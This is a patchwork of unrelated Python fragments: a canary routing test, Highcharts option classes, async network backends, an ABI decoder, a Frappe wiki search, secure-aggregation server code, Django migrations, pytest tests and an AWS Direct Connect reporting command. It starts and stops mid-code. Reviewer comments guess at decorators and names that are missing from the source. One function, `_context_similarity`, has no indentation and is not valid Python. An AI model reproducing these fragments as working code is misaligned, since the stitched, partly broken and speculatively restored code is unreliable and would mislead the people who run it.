        yield (self.canary, self.format('\n---\napiVersion: getambassador.io/v3alpha1\nkind: Mapping\nname: {self.name}-canary\nhostname: "*"\nprefix: /{self.name}/\nservice: canary.2.example.com\nweight: {self.weight}\n'))

    def queries(self):
        # 100 queries make the observed histogram directly comparable to the
        # configured percentage weight.
        for i in range(100):
            yield Query(self.parent.url(self.name + '/'))

    def check(self):
        """Verify the observed backend distribution matches the configured weight."""
        request_hosts = ['canary.1.example.com', 'canary.2.example.com']
        hist: Dict[(str, int)] = {}
        for r in self.results:
            assert r.backend
            hist[r.backend.name] = hist.get(r.backend.name, 0) + 1
            assert r.backend.request
            assert r.backend.request.host in request_hosts, f'Expected host {request_hosts}, got {r.backend.request.host}'
        if self.weight == 0:
            # Degenerate weights must route deterministically.
            assert hist.get(self.canary.path.k8s, 0) == 0
            assert hist.get(self.target.path.k8s, 0) == 100
        elif self.weight == 100:
            assert hist.get(self.canary.path.k8s, 0) == 100
            assert hist.get(self.target.path.k8s, 0) == 0
        else:
            canary = (100 * hist.get(self.canary.path.k8s, 0)) / len(self.results)
            main = (100 * hist.get(self.target.path.k8s, 0)) / len(self.results)
            # Allow statistical slack around the configured weight.
            assert abs(self.weight - canary) < 25, f'weight {self.weight} routed {canary}% to canary'
            assert abs(100 - (canary + main)) < 2, f'weight {self.weight} routed only {(canary + main)}% at all?'
class OptionSeriesAreasplineSonificationContexttracksMappingTime(Options):
    """Accessors for Highcharts `sonification.contextTracks.mapping.time` options.

    NOTE(review): in the source each name was defined twice (getter then
    setter), so the setter silently shadowed the getter — the @property /
    @<name>.setter decorators were evidently stripped; restored here.
    """

    @property
    def mapFunction(self):
        # None means "not configured" (Highcharts default applies).
        return self._config_get(None)

    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mapTo(self):
        return self._config_get(None)

    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)

    @property
    def max(self):
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def within(self):
        return self._config_get(None)

    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False)
def get_tdx_kdata(security_item, start, end):
    """Fetch k-line data for a stock from TDX and normalize column layout/units."""
    api = TdxHq_API()
    with api.connect():
        frame = api.get_k_data(security_item['code'], start, end)
        # Reorder to the layout expected by KDATA_COLUMN_SINA.
        frame = frame[['date', 'code', 'low', 'open', 'close', 'high', 'vol', 'amount']]
        frame['securityId'] = frame['code'].apply(
            lambda code: 'stock_{}_{}'.format(get_exchange(code), code))
        # Scale the raw volume by 100 (TDX reporting unit).
        frame['vol'] = frame['vol'].apply(lambda v: v * 100)
        frame.columns = KDATA_COLUMN_SINA
        return frame
class AutoBackend(AsyncNetworkBackend):
    """Async network backend that lazily resolves to trio or anyio.

    The concrete backend is chosen on first use, based on which async
    library the current task is running under.
    """

    async def _init_backend(self) -> None:
        # Resolve the concrete backend exactly once.
        if hasattr(self, '_backend'):
            return
        if current_async_library() == 'trio':
            from .trio import TrioBackend
            self._backend: AsyncNetworkBackend = TrioBackend()
        else:
            from .anyio import AnyIOBackend
            self._backend = AnyIOBackend()

    async def connect_tcp(self, host: str, port: int, timeout: Optional[float]=None, local_address: Optional[str]=None, socket_options: typing.Optional[typing.Iterable[SOCKET_OPTION]]=None) -> AsyncNetworkStream:
        await self._init_backend()
        return await self._backend.connect_tcp(host, port, timeout=timeout, local_address=local_address, socket_options=socket_options)

    async def connect_unix_socket(self, path: str, timeout: Optional[float]=None, socket_options: typing.Optional[typing.Iterable[SOCKET_OPTION]]=None) -> AsyncNetworkStream:
        await self._init_backend()
        return await self._backend.connect_unix_socket(path, timeout=timeout, socket_options=socket_options)

    async def sleep(self, seconds: float) -> None:
        await self._init_backend()
        return await self._backend.sleep(seconds)
class StringDecoder(ByteStringDecoder):
    """ABI decoder for `string` values: decodes UTF-8 payload bytes.

    `handle_string_errors` selects the codec error policy ('strict',
    'replace', ...) used when decoding.
    """

    def __init__(self, handle_string_errors='strict'):
        self.bytes_errors = handle_string_errors
        super().__init__()

    @parse_type_str('string')
    def from_type_str(cls, abi_type, registry):
        # NOTE(review): the source read bare `_type_str('string')` — restoring
        # eth-abi's @parse_type_str factory decorator; confirm against upstream.
        return cls()

    def decode(self, stream):
        raw_data = self.read_data_from_stream(stream)
        (data, padding_bytes) = self.split_data_and_padding(raw_data)
        value = self.decoder_fn(data, self.bytes_errors)
        self.validate_padding_bytes(value, padding_bytes)
        return value

    @staticmethod
    def decoder_fn(data, handle_string_errors='strict'):
        # No `self` parameter: restore the stripped @staticmethod decorator.
        return data.decode('utf-8', errors=handle_string_errors)
def get_integration_manifests(integration: str, prerelease: Optional[bool]=False, kibana_version: Optional[str]='') -> list:
    """Query the Elastic Package Registry (EPR) for an integration's manifests.

    Returns the raw (unsorted) manifest list from EPR; the sorted copy is only
    used for the log message. Raises on HTTP errors or an empty result.
    """
    # NOTE(review): the URL literal was truncated in the source
    # (`epr_search_url = '`); restored to the public EPR search endpoint.
    epr_search_url = 'https://epr.elastic.co/search'
    # EPR expects string booleans; use a local so the typed parameter
    # is not clobbered with a str.
    prerelease_flag = 'true' if prerelease else 'false'
    epr_search_parameters = {'package': f'{integration}', 'prerelease': prerelease_flag, 'all': 'true', 'include_policy_templates': 'true'}
    if kibana_version:
        epr_search_parameters['kibana.version'] = kibana_version
    epr_search_response = requests.get(epr_search_url, params=epr_search_parameters, timeout=10)
    epr_search_response.raise_for_status()
    manifests = epr_search_response.json()
    if not manifests:
        raise ValueError(f'EPR search for {integration} integration package returned empty list')
    sorted_manifests = sorted(manifests, key=lambda p: Version.parse(p['version']), reverse=True)
    print(f"loaded {integration} manifests from the following package versions: {[manifest['version'] for manifest in sorted_manifests]}")
    return manifests
class BigQueryValues(SqlTree):
    """SQL AST node emitting an inline rowset for BigQuery.

    BigQuery has no standalone VALUES clause, so rows are rendered as
    `SELECT * FROM UNNEST([STRUCT(...), ...]) as item`.
    """
    type: Type        # row type; its `elems` provide the column names
    values: List[Sql] # one entry per row; Tuple rows become STRUCT literals

    def _compile(self, qb):
        cols = list(self.type.elems)
        # Tuple rows: `STRUCT(<expr> as <col>, ...)` pairing values with the
        # declared column names. Other row kinds are assumed to compile to a
        # complete struct expression on their own.
        rows = [(((['STRUCT('] + join_comma(((v.compile(qb).code + [' as ', name]) for (name, v) in safezip(cols, row.values)))) + [')']) if isinstance(row, Tuple) else row.compile(qb).code) for row in self.values]
        return ((['SELECT * FROM UNNEST(['] + join_comma(rows)) + [']) as item'])
def extract_flake8_bandit() -> Dict[(str, str)]:
    """Build a mapping of flake8-bandit codes (Sxxx) to their descriptions."""
    from bandit.core.extension_loader import MANAGER
    codes = {}
    # Blacklist checks: bandit ids look like "Bxxx"; flake8-bandit uses "Sxxx".
    for checks in MANAGER.blacklist.values():
        for check in checks:
            codes[check['id'].replace('B', 'S')] = check['message']
    # Plugin checks: code from the test id, description from the plugin name.
    for plugin in MANAGER.plugins:
        codes[plugin.plugin._test_id.replace('B', 'S')] = plugin.name.replace('_', ' ')
    return codes
class ThreadedAsyncRunner(Thread):
    """Daemon thread that owns an asyncio event loop and accepts coroutines
    scheduled from other threads."""

    def __init__(self, loop: Optional[AbstractEventLoop]=None) -> None:
        """Wrap *loop* (must not be closed) or create a fresh event loop."""
        self._loop = (loop or asyncio.new_event_loop())
        if self._loop.is_closed():
            raise ValueError('Event loop closed.')
        super().__init__(daemon=True)

    def start(self) -> None:
        """Start the thread; no-op if it (or the loop) is already running."""
        if (self.is_alive() or self._loop.is_running()):
            return
        super().start()
        # Submit a trivial coroutine and wait (<= 1s) so callers know the
        # loop is actually serving once start() returns.
        self.call(asyncio.sleep(0.001)).result(1)

    def run(self) -> None:
        # Thread body: serve the loop until stop() halts it.
        _default_logger.debug('Starting threaded asyncio loop...')
        asyncio.set_event_loop(self._loop)
        self._loop.run_forever()
        _default_logger.debug('Asyncio loop has been stopped.')

    def call(self, coro: Coroutine[(Any, Any, Any)]) -> Any:
        """Schedule *coro* on the runner's loop from any thread; returns an
        AnotherThreadTask handle for the result."""
        return AnotherThreadTask(coro, self._loop)

    def stop(self) -> None:
        """Stop the loop thread-safely and wait up to 10s for the thread to join."""
        _default_logger.debug('Stopping...')
        if (not self.is_alive()):
            return
        if self._loop.is_running():
            _default_logger.debug('Stopping loop...')
            # call_soon_threadsafe is required: we are not on the loop thread.
            self._loop.call_soon_threadsafe(self._loop.stop)
        _default_logger.debug('Wait thread to join...')
        self.join(10)
        _default_logger.debug('Stopped.')
# NOTE(review): the decorator below was truncated to `(allow_guest=True)` in
# the source; restored to frappe.whitelist, the conventional guard for
# guest-accessible endpoints — confirm against upstream.
@frappe.whitelist(allow_guest=True)
def search(query, path, space):
    """Full-text search over Wiki Pages.

    Uses RediSearch when enabled and available; otherwise falls back to
    Frappe's built-in web search. Returns {'docs': [...], 'search_engine': name}.
    """
    if not space:
        space = get_space_route(path)
    use_redisearch = frappe.db.get_single_value('Wiki Settings', 'use_redisearch_for_search')
    if (not use_redisearch) or (not _redisearch_available):
        # Fallback path: map web-search results to the common shape.
        result = web_search(query, space, 5)
        for d in result:
            d.title = d.title_highlights or d.title
            d.route = d.path
            d.content = d.content_highlights
            del d.title_highlights
            del d.content_highlights
            del d.path
        return {'docs': result, 'search_engine': 'frappe_web_search'}
    from redis.commands.search.query import Query
    from redis.exceptions import ResponseError
    r = frappe.cache()
    query = Query(query).paging(0, 5).highlight(tags=['<b class="match">', '</b>'])
    try:
        result = r.ft(space).search(query)
    except ResponseError:
        # Missing index / bad query: return empty results rather than erroring.
        return {'docs': [], 'search_engine': 'redisearch'}
    names = []
    for d in result.docs:
        (_, name) = d.id.split(':')
        names.append(name)
    names = list(set(names))
    data_by_name = {d.name: d for d in frappe.db.get_all('Wiki Page', fields=['name'], filters={'name': ['in', names]})}
    docs = []
    for d in result.docs:
        (_, name) = d.id.split(':')
        doc = data_by_name[name]
        # Use the highlighted fields from the search hit, not the DB values.
        doc.title = d.title
        doc.route = d.route
        doc.content = d.content
        docs.append(doc)
    return {'docs': docs, 'search_engine': 'redisearch'}
def stream_encode_multipart(values, threshold=(1024 * 500), boundary=None, charset='utf-8'):
    """Encode a mapping of form fields (and file-like values) as multipart/form-data.

    Returns ``(stream, length, boundary)``: a BytesIO positioned at 0, its
    total byte length, and the boundary used.
    """
    if boundary is None:
        from time import time
        from random import random
        boundary = 'EmmettFormPart_%s%s' % (time(), random())
    stream = BytesIO()
    write_binary = stream.write

    def write(string):
        write_binary(string.encode(charset))

    for key, field_values in values.items():
        # A field may hold a single value or a list of values.
        if not isinstance(field_values, list):
            field_values = [field_values]
        for value in field_values:
            write('--%s\r\nContent-Disposition: form-data; name="%s"' % (boundary, key))
            reader = getattr(value, 'read', None)
            if reader is not None:
                # File-like value: stream it out in chunks.
                filename = getattr(value, 'filename', getattr(value, 'name', None))
                content_type = getattr(value, 'content_type', None)
                if content_type is None:
                    content_type = ((filename and mimetypes.guess_type(filename)[0]) or 'application/octet-stream')
                if filename is not None:
                    write('; filename="%s"\r\n' % filename)
                else:
                    write('\r\n')
                write('Content-Type: %s\r\n\r\n' % content_type)
                while 1:
                    chunk = reader(16384)
                    if not chunk:
                        break
                    write_binary(chunk)
            else:
                # Plain value: coerce to str, then encode. (The original only
                # encoded values that were already str, so non-str values
                # reached write_binary as text and raised TypeError.)
                if not isinstance(value, str):
                    value = str(value)
                value = to_bytes(value, charset)
                write('\r\n\r\n')
                write_binary(value)
            write('\r\n')
    write('--%s--\r\n' % boundary)
    length = int(stream.tell())
    stream.seek(0)
    return (stream, length, boundary)
def fl_json_to_dotlist(json_config: Dict[(str, Any)], append_or_override: bool=True) -> List[str]:
    """Convert a (flattened) JSON config into a Hydra override dotlist."""
    overrides = []
    for key, value in _flatten_dict(json_config).items():
        if key.endswith('._base_'):
            # `_base_` entries select a config group: drop the suffix and
            # prepend '+<group>' so Hydra appends that group's config.
            key = key.replace('._base_', '')
            group = key.split('.')[-1]
            if group.isdigit():
                # Numeric leaf (list index): the group name is one level up.
                group = key.split('.')[-2]
            overrides.append(f'+{group}{key}={value}')
        else:
            rendered = _handle_values_for_overrides_list(value)
            marker = '++' if append_or_override else ''
            overrides.append(f'{marker}{key}={rendered}')
    # Hydra is order-sensitive; sort into its expected merge order.
    return sorted(overrides, key=_hydra_merge_order)
class SyncSecAggSQServer(SyncSecAggServer):
    """Secure-aggregation server that additionally scalar-quantizes updates.

    Requires a ScalarQuantizationChannel with shared qparams so that every
    client quantizes against the same scale/zero-point before the secure
    noise mask is applied.
    """

    def __init__(self, *, global_model: IFLModel, channel: Optional[ScalarQuantizationChannel]=None, **kwargs):
        init_self_cfg(self, component_class=__class__, config_class=SyncSecAggSQServerConfig, **kwargs)
        super().__init__(global_model=global_model, channel=channel, **kwargs)
        if (not isinstance(self._channel, ScalarQuantizationChannel)):
            raise TypeError('SyncSecAggSQServer expects channel of type ScalarQuantizationChannel,', f' {type(self._channel)} given.')
        if (not self._channel.use_shared_qparams):
            raise ValueError('SyncSecAggSQServer expects qparams to be shared across all clients. Have you set sec_agg_mode to True in channel config?')
        # Only multi-dimensional (weight) tensors are quantized; give their
        # fixed-point converters the quantized scaling factor.
        for (n, p) in self.global_model.fl_get_module().named_parameters():
            if (p.ndim > 1):
                self._secure_aggregator.converters[n].scaling_factor = self.cfg.secagg_scaling_factor_for_quantized
        # Per-parameter (scale, zero_point) shared with clients each round.
        self._global_qparams: Dict[(str, Tuple[(Tensor, Tensor)])] = {}

    def global_qparams(self):
        # NOTE(review): reads like a property accessor (and is used without
        # parentheses in receive_update_from_client) — the @property decorator
        # may have been stripped from the source; confirm upstream.
        return self._global_qparams

    def receive_update_from_client(self, message: Message):
        """Ingest one client update: weight it, convert to fixed point, apply
        the secure noise mask, then accumulate into the aggregation buffer."""
        message.qparams = self.global_qparams
        message = self._channel.client_to_server(message)
        self._aggregator.apply_weight_to_update(delta=message.model.fl_get_module(), weight=message.weight)
        self._secure_aggregator.params_to_fixedpoint(message.model.fl_get_module())
        self._secure_aggregator.apply_noise_mask(message.model.fl_get_module().named_parameters())
        self._aggregator.add_update(delta=message.model.fl_get_module(), weight=message.weight)
        self._secure_aggregator.update_aggr_overflow_and_model(model=self._aggregator._buffer_module)

    def step(self):
        """Finish the round: denoise, un-fix-point, dequantize, and take an
        optimizer step on the global model."""
        aggregated_model = self._aggregator.aggregate()
        self._secure_aggregator.apply_denoise_mask(aggregated_model.named_parameters())
        self._secure_aggregator.params_to_float(aggregated_model)
        self._dequantize(aggregated_model)
        FLModelParamUtils.set_gradient(model=self._global_model.fl_get_module(), reference_gradient=aggregated_model)
        self._optimizer.step()

    def _dequantize(self, aggregated_model: torch.nn.Module):
        """Dequantize multi-dim tensors in-place using the shared qparams."""
        model_state_dict = aggregated_model.state_dict()
        new_state_dict = OrderedDict()
        for (name, param) in model_state_dict.items():
            if (param.ndim > 1):
                (scale, zero_point) = self._global_qparams[name]
                # Rebuild a per-tensor quantized tensor so torch can dequantize.
                int_param = param.data.to(dtype=torch.int8)
                q_param = torch._make_per_tensor_quantized_tensor(int_param, scale.item(), int(zero_point.item()))
                deq_param = q_param.dequantize()
                new_state_dict[name] = deq_param
            else:
                # 1-D tensors (biases etc.) were never quantized.
                new_state_dict[name] = param.data
        aggregated_model.load_state_dict(new_state_dict)

    def update_qparams(self, aggregated_model: torch.nn.Module):
        """Recompute the shared qparams from the aggregated model's tensors."""
        (observer, _) = self._channel.get_observers_and_quantizers()
        for (name, param) in aggregated_model.state_dict().items():
            # Reset so each tensor's min/max is observed independently.
            observer.reset_min_max_vals()
            _ = observer(param.data)
            self._global_qparams[name] = observer.calculate_qparams()
def test_instantiate_target_raising_exception_taking_no_arguments(instantiate_func: Any) -> None:
    """Instantiation failure must name the target and chain the raised exception."""
    _target_ = 'tests.instantiate.raise_exception_taking_no_argument'
    # `match` is a regex: parentheses are escaped, and the optional trailing
    # comma tolerates exception-repr differences across Python versions.
    with raises(InstantiationException, match=dedent(f'''
            Error in call to target '{re.escape(_target_)}':
            ExceptionTakingNoArgument\('Err message',?\)''').strip()):
        instantiate_func({}, _target_=_target_)
class OptionPlotoptionsFunnelSonificationDefaultinstrumentoptionsMappingFrequency(Options):
    """Accessors for Highcharts funnel `defaultInstrumentOptions.mapping.frequency`.

    NOTE(review): each name appeared twice (getter then setter) in the source,
    so the setter shadowed the getter — the stripped @property / @<name>.setter
    decorators are restored here.
    """

    @property
    def mapFunction(self):
        # None means "not configured" (Highcharts default applies).
        return self._config_get(None)

    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mapTo(self):
        return self._config_get(None)

    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)

    @property
    def max(self):
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def within(self):
        return self._config_get(None)

    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False)
def update_common_site_config(ddict, bench_path='.'):
    """Merge *ddict* into <bench_path>/sites/common_site_config.json.

    Creates the file if missing; existing keys are overwritten by *ddict*.
    Output is pretty-printed with sorted keys for stable diffs.
    """
    config_path = os.path.join(bench_path, 'sites', 'common_site_config.json')
    current = {}
    if os.path.exists(config_path):
        with open(config_path) as fh:
            current = json.load(fh)
    current.update(ddict)
    with open(config_path, 'w') as fh:
        json.dump(current, fh, indent=1, sort_keys=True)
class UserPermissionMixin(BaseModel):
    """SQLAlchemy mixin for the users<->permissions association table.

    NOTE(review): the bare `_attr` markers and `('perm_name')` line in the
    source are truncated decorators; restored to @declared_attr and
    @validates — confirm against upstream.
    """
    __table_args__ = (sa.PrimaryKeyConstraint('user_id', 'perm_name', name='pk_users_permissions'), {'mysql_engine': 'InnoDB', 'mysql_charset': 'utf8'})

    @declared_attr
    def __tablename__(self):
        return 'users_permissions'

    @declared_attr
    def user_id(self):
        return sa.Column(sa.Integer, sa.ForeignKey('users.id', onupdate='CASCADE', ondelete='CASCADE'), primary_key=True)

    @declared_attr
    def perm_name(self):
        return sa.Column(sa.Unicode(64), primary_key=True)

    @validates('perm_name')
    def validate_perm_name(self, key, value):
        # Enforce lowercase permission names at assignment time.
        if value != value.lower():
            raise AssertionError('perm_name needs to be lowercase')
        return value

    def __repr__(self):
        return '<UserPermission: %s>' % self.perm_name
def test_mode_imputation_with_multiple_variables(df_na):
    """Most-frequent imputation fills each listed column with its own mode."""
    imputer = CategoricalImputer(imputation_method='frequent', variables=['Studies', 'City'])
    result = imputer.fit_transform(df_na)
    # Build the expected frame by hand with the known modes.
    expected = df_na.copy()
    expected['City'] = expected['City'].fillna('London')
    expected['Studies'] = expected['Studies'].fillna('Bachelor')
    assert imputer.imputer_dict_ == {'Studies': 'Bachelor', 'City': 'London'}
    pd.testing.assert_frame_equal(result, expected)
class OptionSeriesScatter3dSonificationTracksMappingPlaydelay(Options):
    """Accessors for Highcharts scatter3d `sonification.tracks.mapping.playDelay`.

    NOTE(review): each name appeared twice (getter then setter) in the source,
    so the setter shadowed the getter — the stripped @property / @<name>.setter
    decorators are restored here.
    """

    @property
    def mapFunction(self):
        # None means "not configured" (Highcharts default applies).
        return self._config_get(None)

    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mapTo(self):
        return self._config_get(None)

    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)

    @property
    def max(self):
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def within(self):
        return self._config_get(None)

    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False)
class CssPivotFilterBoxPopUpButton(CssStyle.Style):
    """CSS style for buttons inside the pivot-table filter pop-up box."""
    classname = 'pvtFilterBox button'
    # Static declarations for the base, hover, focus and disabled states.
    _attrs = {'font-weight': 'bold', 'padding': '0 20px', 'margin': 0, 'text-decoration': 'none', 'border-radius': '4px', 'white-space': 'nowrap', 'display': 'inline-block', 'line-height': '20px', '-webkit-appearance': 'none', '-moz-appearance': 'none'}
    _hover = {'text-decoration': 'none', 'cursor': 'pointer'}
    _focus = {'outline': 0}
    _disabled = {'cursor': 'none'}

    def customize(self):
        """Apply theme-dependent colours resolved from the page theme at runtime."""
        self.css({'border': ('1px solid %s' % self.page.theme.greys[4]), 'color': 'white', 'background-color': self.page.theme.colors[(- 1)]})
        # Hover inverts the colour scheme; important=True to win over _attrs.
        self.hover.css({'background-color': self.page.theme.colors[0], 'color': self.page.theme.colors[(- 1)]}, important=True)
class Migration(migrations.Migration):
    """Replace gtassf133balances' text DEFC column with a foreign key.

    Sequence: add the FK under a temporary db column, update the unique
    constraint, copy data via copy_defc_column, rename the old text column out
    of the way, repoint the FK at the original column name, and finally drop
    the old column. The RunPython reverse is a no-op.
    """
    dependencies = [('references', '0053_office')]
    operations = [migrations.AddField(model_name='gtassf133balances', name='disaster_emergency_fund', field=models.ForeignKey(blank=True, db_column='disaster_emergency_fund_code_temp', null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='references.DisasterEmergencyFundCode')), migrations.AlterUniqueTogether(name='gtassf133balances', unique_together={('fiscal_year', 'fiscal_period', 'disaster_emergency_fund', 'tas_rendering_label')}), migrations.RunPython(copy_defc_column, reverse_code=migrations.RunPython.noop), migrations.RenameField(model_name='gtassf133balances', old_name='disaster_emergency_fund_code', new_name='disaster_emergency_fund_code_old'), migrations.AlterField(model_name='gtassf133balances', name='disaster_emergency_fund', field=models.ForeignKey(blank=True, db_column='disaster_emergency_fund_code', null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='references.DisasterEmergencyFundCode')), migrations.RemoveField(model_name='gtassf133balances', name='disaster_emergency_fund_code_old')]
class TestInlineHiliteNoClassNoPygments(util.MdCase):
    """InlineHilite with Pygments disabled and an empty css_class.

    The shebang language should still surface as a `language-*` class on the
    code element, with no extra wrapper class.
    """
    extension = ['pymdownx.highlight', 'pymdownx.inlinehilite']
    extension_configs = {'pymdownx.highlight': {'css_class': '', 'use_pygments': False}}

    def test_no_class_no_pygments(self):
        """`#!python` inline code maps to class="language-python" only."""
        self.check_markdown('Lets test inline highlight no guessing and no text styling `#!python import module`.', '<p>Lets test inline highlight no guessing and no text styling <code class="language-python">import module</code>.</p>')
def _context_similarity(ctx_ref, ctx_trg, repeats, same_len):
def alignment(ref, trg):
GAP = (- 2)
def match(a, b):
mult = (1 if ((abs(a) in repeats) or (abs(b) in repeats)) else 2)
if (a != b):
return (- mult)
else:
return mult
(l1, l2) = ((len(ref) + 1), (len(trg) + 1))
table = [[0 for _ in range(l2)] for _ in range(l1)]
if same_len:
for i in range(l1):
table[i][0] = (i * GAP)
for i in range(l2):
table[0][i] = (i * GAP)
for (i, j) in product(range(1, l1), range(1, l2)):
table[i][j] = max((table[(i - 1)][j] + GAP), (table[i][(j - 1)] + GAP), (table[(i - 1)][(j - 1)] + match(ref[(i - 1)], trg[(j - 1)])))
return table[(- 1)][(- 1)]
if ((len(ctx_trg.left) + len(ctx_trg.right)) == 0):
return 0
left = alignment(ctx_ref.left, ctx_trg.left)
right = alignment(ctx_ref.right[::(- 1)], ctx_trg.right[::(- 1)])
return (left + right) |
# NOTE(review): both skipif markers were truncated to bare `.skipif(...)` in
# the source (syntax errors); restored assuming the file imports `pytest`.
@pytest.mark.skipif(not has_torch, reason='needs PyTorch')
@pytest.mark.skipif(has_torch_amp, reason='needs PyTorch without gradient scaling support')
def test_raises_on_old_pytorch():
    """Enabling PyTorchGradScaler must fail on torch versions without AMP support."""
    import torch
    scaler = PyTorchGradScaler(enabled=True)
    with pytest.raises(ValueError, match='not supported.*1.9.0'):
        scaler.scale([torch.tensor([1.0], device='cpu')])
_arguments
# NOTE(review): `_arguments` above is almost certainly a truncated decorator
# (the '@' and a name prefix were stripped by whatever mangled this file);
# restore it from upstream before relying on this CLI entry point.
def count_events(args):
    """CLI handler: print how many events match the given key/namespace/sender.

    The starting offset comes from --begin-offset, or is derived from
    --begin-time via the server's time->offset mapping.
    """
    client = EmbeddedNotificationClient(server_uri=args.server_uri)
    offset = 0
    if args.begin_offset:
        offset = args.begin_offset
    elif args.begin_time:
        offset = client.time_to_offset(time_utils.timestamp_to_datetime(args.begin_time))
    res = client.count_events(key=args.key, namespace=args.namespace, sender=args.sender, begin_offset=offset)
    # Only the first element of the response is printed (the count).
    print(res[0])
# NOTE(review): the decorator prefix was truncated to `_blueprint.route` in the
# source; restored with the name `api_blueprint` — confirm the actual blueprint
# name against upstream.
@api_blueprint.route('/api/by_ecosystem/<ecosystem>/<project_name>/', methods=['GET'])
@api_blueprint.route('/api/by_ecosystem/<ecosystem>/<project_name>', methods=['GET'])
def api_get_project_ecosystem(ecosystem, project_name):
    """Return a project (by name within an ecosystem) as JSON, 404 when absent."""
    project = models.Project.by_name_and_ecosystem(Session, project_name, ecosystem)
    if not project:
        output = {'output': 'notok', 'error': f'No project "{project_name}" found in ecosystem "{ecosystem}"'}
        # NOTE(review): the variable name on these status lines was erased in
        # the source (bare `= 404`); reconstructed as a local `httpcode`.
        httpcode = 404
    else:
        output = project.__json__(detailed=True)
        httpcode = 200
    jsonout = flask.jsonify(output)
    jsonout.status_code = httpcode
    return jsonout
# NOTE(review): the marker name was stripped from this parametrize decorator
# (only the argument tuple survived); restored assuming `pytest` is imported.
@pytest.mark.parametrize('task_function, expected_file, expected_module', [param(data.foo, None, 'tests.data', id='function'), param(data.foo_main_module, data.__file__, None, id='function-main-module'), param(data.Bar, None, 'tests.data', id='class'), param(data.bar_instance, None, 'tests.data', id='class_inst'), param(data.bar_instance_main_module, None, None, id='class_inst-main-module')])
def test_detect_calling_file_or_module_from_task_function(task_function: Callable[(..., None)], expected_file: Optional[str], expected_module: Optional[str]) -> None:
    """Each task callable must resolve to its expected defining file or module."""
    (file, module) = utils.detect_calling_file_or_module_from_task_function(task_function)
    assert file == expected_file
    assert module == expected_module
class CLICommand(RegionalCommand):
    """Report Direct Connect circuits, their VIFs and CloudWatch bandwidth charts."""

    @classmethod
    def regional_from_cli(cls, parser, argv, cfg):
        """Build a CLICommand from CLI args merged with config defaults.

        NOTE(review): the `cls` first parameter implies this was declared
        @classmethod; the decorator appears stripped in the source.
        """
        parser.add_argument('--verbose', action='store_true', help='include each VIF and its status in output', default=cfg('verbose', type=Bool))
        stats = ['Average', 'Minimum', 'Maximum', 'p90', 'p95', 'p99', 'p99.9']
        parser.add_argument('--stat', metavar='STAT', choices=stats, help=('aggregate on STAT: ' + ', '.join(stats)), default=cfg('stat', type=Choice(*stats), default='p95'))
        parser.add_argument('--height', type=int, metavar='LINES', help='height of chart in LINES, a sparkline is used if 1, no charts if 0', default=cfg('height', type=PosInt, default=1))
        parser.add_argument('--auto-scale', action='store_true', help='do not use the maximum circuit b/w as height of y-axis', default=cfg('auto_scale', type=Bool, default=False))
        timespec = parser.add_mutually_exclusive_group()
        timespec.add_argument('--hours', type=int, help='retrieve metrics from HOURS ago', default=cfg('hours', type=PosInt))
        timespec.add_argument('--days', type=int, help='retrieve metrics from DAYS ago', default=cfg('days', type=PosInt))
        args = parser.parse_args(argv)
        return cls(**vars(args))

    def __init__(self, regions, height, hours, days, stat, auto_scale, verbose):
        super().__init__(regions)
        # Default lookback window is one hour when neither unit was given.
        if hours is None and days is None:
            hours = 1
        self.last = (hours * 3600) if hours else ((days * 3600) * 24)
        self.stat = stat
        self.height = height
        self.auto_scale = auto_scale
        self.verbose = verbose
        colorama.init()

    def regional_execute(self, session, acct, region):
        """Render the report for one account/region and return it as a string."""
        out = io.StringIO()
        prefix = f'{acct}/{region}:'
        cw = session.client('cloudwatch', region_name=region)
        dx = session.client('directconnect', region_name=region)
        conn_by_id = {}
        for c in dx.describe_connections()['connections']:
            conn_by_id[c['connectionId']] = c
        if not conn_by_id:
            # Nothing to report in this region.
            return ''
        vifs_by_conn = defaultdict(list)
        for vif in dx.describe_virtual_interfaces()['virtualInterfaces']:
            c_id = vif['connectionId']
            vifs_by_conn[c_id].append(vif)
        metrics = None
        if self.height > 0:
            metrics = self._load_dx_metrics(cw, conn_by_id.keys())
        # Stable, name-sorted output per connection.
        for (c_id, conn) in sorted(conn_by_id.items(), key=(lambda c: c[1]['connectionName'])):
            vifs = vifs_by_conn[c_id]
            if self.verbose:
                for vif in vifs:
                    print(f'{prefix} {_vif2str(vif, conn)}', file=out)
            print(f'{prefix} {_conn2str(conn, vifs)}', file=out)
            if metrics:
                _print_conn_metrics(conn, metrics[c_id], height=self.height, auto_yaxis=self.auto_scale, prefix=prefix, file=out)
        return out.getvalue()

    def _load_dx_metrics(self, cw, connections):
        """Bulk-load ingress/egress bandwidth and state metrics per connection."""
        cwm = CWMetrics(cw, last=self.last)
        metrics = defaultdict(dict)
        for c_id in connections:
            dimension = {'ConnectionId': c_id}
            for name in ['ConnectionBpsIngress', 'ConnectionBpsEgress']:
                get_values = cwm.add_metric('AWS/DX', name, dimension, self.stat)
                metrics[c_id][name] = get_values
            for name in ['ConnectionState']:
                get_values = cwm.add_metric('AWS/DX', name, dimension, 'Minimum')
                # Bind get_values as a default arg so each closure keeps its
                # own loader; values pass through `invert` — presumably to
                # flip the state flag's polarity (confirm against `invert`).
                metrics[c_id][name] = (lambda f=get_values: ((t, invert(v)) for (t, v) in f()))
        cwm.bulk_load()
        return metrics
# NOTE(review): the marker was truncated to `.skipif(...)` in the source, and
